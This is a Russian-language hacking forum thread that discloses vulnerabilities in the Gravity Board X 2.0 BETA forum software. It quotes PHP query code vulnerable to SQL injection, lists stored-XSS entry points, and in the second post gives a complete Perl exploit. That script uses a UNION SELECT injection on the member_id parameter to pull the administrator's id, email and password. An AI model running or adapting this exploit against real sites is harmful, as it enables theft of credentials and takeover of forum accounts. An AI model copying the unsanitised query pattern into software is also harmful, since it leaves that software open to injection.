Gravity Board X

Discussion in 'Веб-уязвимости' started by Ctacok, 10 Nov 2009.

  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Название: Gravity Board X
    Офф. сайт: http://www.gravityboardx.com
    Версия: 2.0 BETA (Public Release 3)

    SQL Иньекция.
    Уязвимый код:
    PHP:
    $miquery mysql_query("SELECT * FROM " $prefix "members WHERE memberid = '{$_GET['member_id']}'") OR DIE("Gravity Board X was unable get the member data requested from the members database: " mysql_error());
    Уязвимый код:
    PHP:
    $imquery mysql_query("SELECT * FROM " $prefix "ims WHERE imid='{$_GET['imid']}' AND imto='{$_SESSION['memberid']}'"$connection) OR DIE("Gravity Board X was unable to retrieve your personal message from the database: " mysql_error());

    Активная XSS.
    /index.php?action=newpm
    В поле Message(Сообщение).
    И отправляем.

    /index.php?action=postnew&board_id=[Номер категории]
    Имя: Bla
    Message:
    Пассивная XSS

     
    2 people like this.
  2. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Опубликовал сплойт Gravity Board X 2.0 BETA (Public Release 3) SQL INJECTION EXPLOIT
    PHP:
    #!/usr/bin/perl 
    use LWP::Simple;
    print 
    "\n";
    print 
    "##############################################################\n";
    print 
    "# Gravity Board X 2.0 BETA (Public Release 3) SQL INJECTION  #\n";
    print 
    "# Author: Ctacok  (Russian)                                  #\n";
    print 
    "# Blog : www.Ctacok.ru                                       #\n";
    print 
    "# Special for Antichat (forum.antichat.ru) and xakep.ru      #\n";
    print 
    "# Big Thanks to Slip :)                                      #\n";
    print 
    "# Require : Magic_quotes = Off                               #\n";
    print 
    "##############################################################\n";
    if (@
    ARGV 2)
    {
    print 
    "\n Usage: exploit.pl [host] [path] ";
    print 
    "\n EX : exploit.pl www.localhost.com /path/ prefix \n\n";
    exit;
    }
    $host=$ARGV[0];
    $path=$ARGV[1];
    $prefix=$ARGV[2];   #  PREFIX TABLES, Default: gbx
    $vuln "-2'+union+select+concat(0x3a3a3a,memberid,0x3a,email,0x3a,pw,0x3a3a3a)+from+".$prefix."_members";
    $doc get($host.$path."index.php?action=viewprofile&member_id=".$vuln."+--+");
    if (
    $doc =~ /:::(.+):(.+):(.+):::/){
            print 
    "\n[+] Admin id: : $1";
                    print 
    "\n[+] Admin email: $2";
                    print 
    "\n[+] Admin password: $3";
    }
     
    5 people like this.